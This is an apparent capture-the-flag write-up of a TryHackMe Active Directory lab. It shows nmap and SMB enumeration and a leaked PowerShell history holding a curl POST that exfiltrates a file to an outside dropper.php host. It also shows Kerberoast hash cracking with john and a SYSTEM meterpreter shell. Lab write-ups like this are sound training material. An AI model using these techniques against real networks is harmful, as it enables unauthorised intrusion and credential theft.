# Nmap 7.93 scan initiated Sat Feb 11 18:57:36 2023 as: nmap -sSVC -T4 -p- -v --open --reason -oA nmap enterprise.thm Nmap scan report for enterprise.thm (10.10.193.5) Host is up, received echo-reply ttl 127 (0.029s latency). Not shown: 59842 closed tcp ports (reset), 5664 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE REASON VERSION 53/tcp open domain syn-ack ttl 127 Simple DNS Plus 80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-title: Site doesn't have a title (text/html). |_http-server-header: Microsoft-IIS/10.0 88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-02-11 17:58:02Z) 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: ENTERPRISE.THM0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? syn-ack ttl 127 464/tcp open kpasswd5? syn-ack ttl 127 593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped syn-ack ttl 127 3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: ENTERPRISE.THM0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped syn-ack ttl 127 3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services | ssl-cert: Subject: commonName=LAB-DC.LAB.ENTERPRISE.THM | Issuer: commonName=LAB-DC.LAB.ENTERPRISE.THM | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2023-02-10T17:12:19 | Not valid after: 2023-08-12T17:12:19 | MD5: ed0aeea31749fb2c6dd40b52bb63c434 |_SHA-1: 0e4fc244394805550c9aae137582e60e6fbb238d |_ssl-date: 2023-02-11T17:58:59+00:00; 0s from scanner time. | rdp-ntlm-info: | Target_Name: LAB-ENTERPRISE | NetBIOS_Domain_Name: LAB-ENTERPRISE | NetBIOS_Computer_Name: LAB-DC | DNS_Domain_Name: LAB.ENTERPRISE.THM | DNS_Computer_Name: LAB-DC.LAB.ENTERPRISE.THM | DNS_Tree_Name: ENTERPRISE.THM | Product_Version: 10.0.17763 |_ System_Time: 2023-02-11T17:58:51+00:00 5357/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Service Unavailable |_http-server-header: Microsoft-HTTPAPI/2.0 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 7990/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 |_http-title: Log in to continue - Log in with Atlassian account | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing 47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49669/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 49670/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49672/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49676/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49701/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49711/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49844/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC Service Info: Host: LAB-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Feb 11 18:59:00 2023 -- 1 IP address (1 host up) scanned in 83.79 seconds
The rdp-ntlm-info module already give us some DNS information:
$ enum4linux-ng -A lab-dc.lab.enterprise.thm ... ============================================================= | Domain Information via SMB session for enterprise.thm | ============================================================= [*] Enumerating via unauthenticated SMB session on 445/tcp [+] Found domain information via SMB NetBIOS computer name: LAB-DC NetBIOS domain name: LAB-ENTERPRISE DNS domain: LAB.ENTERPRISE.THM FQDN: LAB-DC.LAB.ENTERPRISE.THM Derived membership: domain member Derived domain: LAB-ENTERPRISE ... ================================================= | OS Information via RPC for enterprise.thm | ================================================= [*] Enumerating via unauthenticated SMB session on 445/tcp [+] Found OS information via SMB [*] Enumerating via 'srvinfo' [-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED [+] After merging OS information we have the following result: OS: Windows 10, Windows Server 2019, Windows Server 2016 OS version: '10.0' OS release: '1809' OS build: '17763' Native OS: not supported Native LAN manager: not supported Platform id: null Server type: null Server type string: null
Outside the windows version, we learned nothing new here.
enum4linux-ng found not share and smbmap show we can connect with null or guest session but can't enumerate the shares.
[+] IP: lab-dc.lab.enterprise.thm:445 Name: unknown Status: Authenticated [!] Something weird happened: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.) on line 967
[+] IP: lab-dc.lab.enterprise.thm:445 Name: unknown Status: Guest session [!] Something weird happened: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.) on line 967
But we can successfully retrieve the list at a lower level with
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share Docs Disk IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share Users Disk Users Share. Do Not Touch! SMB1 disabled -- no workgroup available
Then I use dolphin to browse the smb shares conveniently: smb://lab-dc.lab.enterprise.thm/Users.
There are a lot of stuff but we don't have the permission for most of it:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
➜ smbclient '\\lab-dc.lab.enterprise.thm\Users' -U 'WORKGROUP/noraj%fakepass' Try "help" to get a list of possible commands. smb: \> dir . DR 0 Fri Mar 12 03:11:49 2021 .. DR 0 Fri Mar 12 03:11:49 2021 Administrator D 0 Thu Mar 11 22:55:48 2021 All Users DHSrn 0 Sat Sep 15 09:28:48 2018 atlbitbucket D 0 Thu Mar 11 23:53:06 2021 bitbucket D 0 Fri Mar 12 03:11:51 2021 Default DHR 0 Fri Mar 12 01:18:03 2021 Default User DHSrn 0 Sat Sep 15 09:28:48 2018 desktop.ini AHS 174 Sat Sep 15 09:16:48 2018 LAB-ADMIN D 0 Fri Mar 12 01:28:14 2021 Public DR 0 Thu Mar 11 22:27:02 2021
15587583 blocks of size 4096. 9927088 blocks available smb: \> recurse on smb: \> prompt off smb: \> mget *
There are folders related to bitbucket but we can't access them. I quickly used a tree command to see what we where able to retrieve. I quickly noticed there was a PowerShell history file.
$ cat LAB-ADMIN/AppData/Roaming/Microsoft/Windows/Powershell/PSReadline/Consolehost_hisory.txt cd C:\ mkdir monkey cd monkey cd .. cd .. cd .. cd D: cd D: cd D: D:\ mkdir temp cd temp echo "replication:EDITED">private.txt Invoke-WebRequest -Uri http://1.215.10.99/payment-details.txt more payment-details.txt curl -X POST -H 'Cotent-Type: ascii/text' -d .\private.txt' http://1.215.10.99/dropper.php?file=itsdone.txt del private.txt del payment-details.txt cd .. del temp cd C:\ C:\ exit
We can't connect with those creds anywhere (tried with ldap, winrm and rdp too):
$ smbclient '\\enterprise.thm\Docs' -U 'WORKGROUP/noraj%fakepass' Try "help" to get a list of possible commands. smb: \> dir . D 0 Mon Mar 15 03:47:35 2021 .. D 0 Mon Mar 15 03:47:35 2021 RSA-Secured-Credentials.xlsx A 15360 Mon Mar 15 03:46:54 2021 RSA-Secured-Document-PII.docx A 18432 Mon Mar 15 03:45:24 2021
15587583 blocks of size 4096. 9926354 blocks available
Those two documents are password protected and the password from the powershell history doesn't work here either.
[-] Users with old password [!] Username: Administrator Password last change: 702 days ago 2021-03-11 21:23:37 [!] Username: atlbitbucket Password last change: 702 days ago 2021-03-11 22:52:53 [!] Username: krbtgt Password last change: 701 days ago 2021-03-12 00:31:21 [!] Username: ENTERPRISE$ Password last change: 701 days ago 2021-03-12 00:41:22 [!] Username: bitbucket Password last change: 701 days ago 2021-03-12 01:20:01 [!] Username: nik Password last change: 701 days ago 2021-03-12 01:33:25 [!] Username: replication Password last change: 701 days ago 2021-03-12 03:01:41 [!] Username: spooks Password last change: 701 days ago 2021-03-12 03:35:24 [!] Username: korone Password last change: 701 days ago 2021-03-12 03:36:10 [!] Username: banana Password last change: 701 days ago 2021-03-12 03:37:11 [!] Username: Cake Password last change: 701 days ago 2021-03-12 03:39:42 [!] Username: contractor-temp Password last change: 701 days ago 2021-03-12 03:44:27 [!] Username: varg Password last change: 701 days ago 2021-03-12 03:45:57 [!] Username: joiner Password last change: 698 days ago 2021-03-15 01:15:38
[-] Users with an interesting description [*] Username: contractor-temp Change password from EDITED
[-] Users with not the default encryption [*] Username: krbtgt Password is in a reversible encryption or in DES ! [*] Username: bitbucket Password is in a reversible encryption or in DES !
[-] Protecting Privileged Domain Accounts [!] No entry found !
[-] Not Default Attributes (TEST IN BETA)
[!] No entry found !
[-] Laps Password [!] No entry found !
==================================================== ==================== Attack AD ===================== ====================================================
replication password age is 701 days but has not the attribute Password Not Expire and in the password policy the max age is 42 days so the account is expired and the password must be changed (but we can't).
$ john kerbHash.hash -w=/usr/share/wordlists/passwords/rockyou.txt --format=krb5tgs Using default input encoding: UTF-8 Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status EDITED (?) 1g 0:00:00:01 DONE (2023-02-12 00:01) 0.6896g/s 1083Kp/s 1083Kc/s 1083KC/s livelife92..liss23 Use the "--show" option to display all of the cracked passwords reliably Session completed
meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
meterpreter > shell Process 5720 created. Channel 1 created. Microsoft Windows [Version 10.0.17763.1817] (c) 2018 Microsoft Corporation. All rights reserved.